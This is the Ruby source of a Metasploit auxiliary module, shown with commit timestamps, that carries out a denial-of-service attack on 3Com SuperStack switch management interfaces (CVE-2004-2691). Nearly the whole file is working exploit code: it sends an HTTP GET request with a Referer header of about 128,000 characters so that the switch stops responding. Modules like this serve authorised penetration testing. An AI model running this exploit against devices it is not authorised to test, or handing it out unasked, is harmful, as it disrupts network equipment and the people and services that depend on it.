metasploit-framework/modules/auxiliary/dos/http/3com_superstack_switch.rb

54 lines
1.7 KiB
Ruby
Raw Normal View History

##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => '3Com SuperStack Switch Denial of Service',
'Description' => %q{
This module causes a temporary denial of service condition
against 3Com SuperStack switches. By sending excessive data
to the HTTP Management interface, the switch stops responding
temporarily. The device does not reset. Tested successfully
against a 3300SM firmware v2.66. Reported to affect versions
prior to v2.72.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'References' =>
[
# patrickw - I am not sure if these are correct, but the closest match!
[ 'OSVDB', '7246' ],
2013-08-30 21:28:54 +00:00
[ 'CVE', '2004-2691' ],
[ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],
],
'DisclosureDate' => 'Jun 24 2004'))
register_options( [ Opt::RPORT(80) ])
2013-08-30 21:28:54 +00:00
end
def run
begin
connect
print_status("Sending DoS packet to #{rhost}:#{rport}")
sploit = "GET / HTTP/1.0\r\n"
sploit << "Referer: " + Rex::Text.rand_text_alpha(1) * 128000
sock.put(sploit +"\r\n\r\n")
disconnect
2017-07-19 11:48:52 +00:00
print_error("DoS packet unsuccessful")
2013-08-30 21:28:54 +00:00
rescue ::Rex::ConnectionRefused
2017-07-19 11:48:52 +00:00
print_error("Unable to connect to #{rhost}:#{rport}")
2013-08-30 21:28:54 +00:00
rescue ::Errno::ECONNRESET
2017-07-19 11:48:52 +00:00
print_good("DoS packet successful. #{rhost} not responding.")
2013-08-30 21:28:54 +00:00
end
end
end